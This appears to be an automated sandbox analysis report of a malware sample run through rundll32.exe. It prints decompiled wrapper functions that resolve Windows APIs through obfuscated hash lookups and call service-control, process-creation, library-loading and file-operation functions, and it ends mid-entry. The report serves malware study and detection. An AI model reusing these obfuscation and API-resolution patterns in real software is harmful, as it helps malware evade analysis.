                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: 46e8d10550a73657c38d30a72f43b91e223ea195f7de58e536ff4085b5ab4dbd
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: BFF04FB4C11208FFDB48DFA0E94689EBFB8EB40300F208198E409A7260E7715F159F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: rundll32.exe PID: 2904 Parent PID: 2488 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 001A2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001A2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001A602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001B07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x001a295f
                                                      0x001a2964
                                                      0x001a2967
                                                      0x001a296a
                                                      0x001a296d
                                                      0x001a296e
                                                      0x001a296f
                                                      0x001a2977
                                                      0x001a2985
                                                      0x001a298a
                                                      0x001a2992
                                                      0x001a299a
                                                      0x001a29a2
                                                      0x001a29a9
                                                      0x001a29b0
                                                      0x001a29b7
                                                      0x001a29bb
                                                      0x001a29cf
                                                      0x001a29dc
                                                      0x001a29e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001A29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 7b0a8e02d6e4e46963524e66524c54831fc3d0afbd4c5ef215edc869d65f3b2a
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: EA018072A00108BFEB14DF95DC0A8DFBFB6EF49310F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001AC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001AC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001A602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001B07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x001ac6e1
                                                      0x001ac6e6
                                                      0x001ac6f0
                                                      0x001ac6fc
                                                      0x001ac703
                                                      0x001ac706
                                                      0x001ac70d
                                                      0x001ac711
                                                      0x001ac715
                                                      0x001ac71c
                                                      0x001ac723
                                                      0x001ac72a
                                                      0x001ac731
                                                      0x001ac738
                                                      0x001ac751
                                                      0x001ac762
                                                      0x001ac768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001AC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: abb4ead3d15a2d311866cd30af1d7a5d69145d8fe84047fc9b1548711bdea889
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: EA1133B290122DBBCB25DF94DD498DFBFB8EF15714F108188F90962210D7714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001A1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E001A1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001A602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001B07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x001a1006
                                                      0x001a1009
                                                      0x001a100c
                                                      0x001a1011
                                                      0x001a1016
                                                      0x001a101d
                                                      0x001a1026
                                                      0x001a102d
                                                      0x001a1034
                                                      0x001a103b
                                                      0x001a1047
                                                      0x001a104f
                                                      0x001a1057
                                                      0x001a105e
                                                      0x001a1065
                                                      0x001a106c
                                                      0x001a1073
                                                      0x001a1077
                                                      0x001a108b
                                                      0x001a1096
                                                      0x001a109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001A1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: 4e78ff881fbf81e34c19e351b8fa836985c84070c7989e4a4b9b1d77e96f5258
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: 27015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E51466291D7B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001A4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E001A4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001B07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                                      0x001a485e
                                                      0x001a487a
                                                      0x001a487d
                                                      0x001a4884
                                                      0x001a488b
                                                      0x001a4892
                                                      0x001a489d
                                                      0x001a48a0
                                                      0x001a48ad
                                                      0x001a48b7

                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001A48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: 701050d1d8da0dc6fc27a8266d6bcf8b8c962779236a67653d33ba44b90a7a95
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 35F017B0A05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E7B15F509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001B4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E001B4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001A602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001B07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x001b4f80
                                                      0x001b4f81
                                                      0x001b4f82
                                                      0x001b4f86
                                                      0x001b4f87
                                                      0x001b4f8c
                                                      0x001b4fa5
                                                      0x001b4fa8
                                                      0x001b4faf
                                                      0x001b4fb6
                                                      0x001b4fc7
                                                      0x001b4fca
                                                      0x001b4fd7
                                                      0x001b4fe2
                                                      0x001b4fe7

                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001B4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 830e9472c321ece4e63b4b0af6f90ced4f37615fb4d137407f189fddae9011c5
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 47F037B081120CFFDB04DFA4DA4289EBFBAEB44300F208199E804AB250D7715B509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001B976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E001B976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001A602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001B07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                                      0x001b9772
                                                      0x001b9773
                                                      0x001b9778
                                                      0x001b977a
                                                      0x001b977b
                                                      0x001b977e
                                                      0x001b977f
                                                      0x001b9782
                                                      0x001b9785
                                                      0x001b9788
                                                      0x001b9789
                                                      0x001b978c
                                                      0x001b978f
                                                      0x001b9790
                                                      0x001b9791
                                                      0x001b9794
                                                      0x001b9797
                                                      0x001b979a
                                                      0x001b979d
                                                      0x001b97a0
                                                      0x001b97a3
                                                      0x001b97a6
                                                      0x001b97a7
                                                      0x001b97a8
                                                      0x001b97ad
                                                      0x001b97b7
                                                      0x001b97c3
                                                      0x001b97ca
                                                      0x001b97d1
                                                      0x001b97d8
                                                      0x001b97df
                                                      0x001b97e3
                                                      0x001b97fc
                                                      0x001b9816
                                                      0x001b981d

                                                      APIs
                                                      • CreateProcessW.KERNEL32(001A591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001A591A), ref: 001B9816
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: c14167928e6f8a19f945f8d6f9c5ceb943b34b86e27e48255c8f3f464bc41596
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: B611D372800148BBDF1A9FD2DC0ACDF7F3AEF89750F104048FA1452120D2728AA0EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001AB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E001AB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001A602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001B07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x001ab569
                                                      0x001ab56a
                                                      0x001ab56d
                                                      0x001ab572
                                                      0x001ab574
                                                      0x001ab577
                                                      0x001ab57a
                                                      0x001ab57d
                                                      0x001ab580
                                                      0x001ab583
                                                      0x001ab586
                                                      0x001ab587
                                                      0x001ab58a
                                                      0x001ab58d
                                                      0x001ab590
                                                      0x001ab593
                                                      0x001ab594
                                                      0x001ab595
                                                      0x001ab59a
                                                      0x001ab5a4
                                                      0x001ab5b8
                                                      0x001ab5c0
                                                      0x001ab5c4
                                                      0x001ab5cb
                                                      0x001ab5d2
                                                      0x001ab5d9
                                                      0x001ab5e6
                                                      0x001ab5fd
                                                      0x001ab604

                                                      APIs
                                                      • CreateFileW.KERNELBASE(001B0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001B0668,?,?,?,?), ref: 001AB5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: e5733e9fdf210549cf26afe424110afe728034a9007d37a999dcfce89e81f1c0
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: BB11B272801248BBDF16DF95DD06CEE7F7AEF89314F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001B981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E001B981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001A602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001B07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x001b9821
                                                      0x001b9822
                                                      0x001b9825
                                                      0x001b9828
                                                      0x001b982a
                                                      0x001b982c
                                                      0x001b982f
                                                      0x001b9832
                                                      0x001b9835
                                                      0x001b9836
                                                      0x001b9837
                                                      0x001b983c
                                                      0x001b9855
                                                      0x001b9858
                                                      0x001b985f
                                                      0x001b9866
                                                      0x001b986d
                                                      0x001b9874
                                                      0x001b987b
                                                      0x001b988e
                                                      0x001b989b
                                                      0x001b98a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001A87F2,0000CAAE,0000510C,AD82F196), ref: 001B989B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 42a206b897d3a744831a2136ae9c7f5b8d244681696b6909cee3277b473e3bb2
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 62019A76801208FBDB04EFE5D846CDFBF79EF85310F108188F908A6220E7715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001B7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001B7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001A602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001B07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                                      0x001b7bf7
                                                      0x001b7bf8
                                                      0x001b7bfa
                                                      0x001b7bfd
                                                      0x001b7bff
                                                      0x001b7c02
                                                      0x001b7c06
                                                      0x001b7c07
                                                      0x001b7c0f
                                                      0x001b7c1d
                                                      0x001b7c25
                                                      0x001b7c2d
                                                      0x001b7c31
                                                      0x001b7c38
                                                      0x001b7c3f
                                                      0x001b7c46
                                                      0x001b7c4a
                                                      0x001b7c5e
                                                      0x001b7c67
                                                      0x001b7c6d

                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001B7C67
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: 5e8e6e0cdd4164639f69cbbc61abfe607cd10762053eb91f82b675b17997c5af
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 9F014BB190120CFFEB09DFA4C94A8DEBBB9EF55314F208198F505A7240EBB15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001AF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 52%
                                                      			E001AF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001A602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001B07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                                      0x001af662
                                                      0x001af663
                                                      0x001af665
                                                      0x001af668
                                                      0x001af66a
                                                      0x001af66d
                                                      0x001af670
                                                      0x001af673
                                                      0x001af677
                                                      0x001af678
                                                      0x001af67d
                                                      0x001af687
                                                      0x001af693
                                                      0x001af69a
                                                      0x001af6a1
                                                      0x001af6a5
                                                      0x001af6a9
                                                      0x001af6b0
                                                      0x001af6c9
                                                      0x001af6d8
                                                      0x001af6de

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001AF6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: aab9d42c268e910dc9a8f538ab20f7f7e710b89855c126f8d0e1ce521e15dfe7
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: 7301E5B6901208BBEF059F94DD068DF7F75EB15324F148188F90462250D7B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001AB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001AB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001A602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001B07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                                      0x001ab6f3
                                                      0x001ab6f8
                                                      0x001ab702
                                                      0x001ab70b
                                                      0x001ab712
                                                      0x001ab719
                                                      0x001ab720
                                                      0x001ab727
                                                      0x001ab72e
                                                      0x001ab747
                                                      0x001ab759
                                                      0x001ab75e

                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001AB759
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: 81ee3e12c56c95e62bf86db32ba309777ebfeea9871da59311798476c7155c51
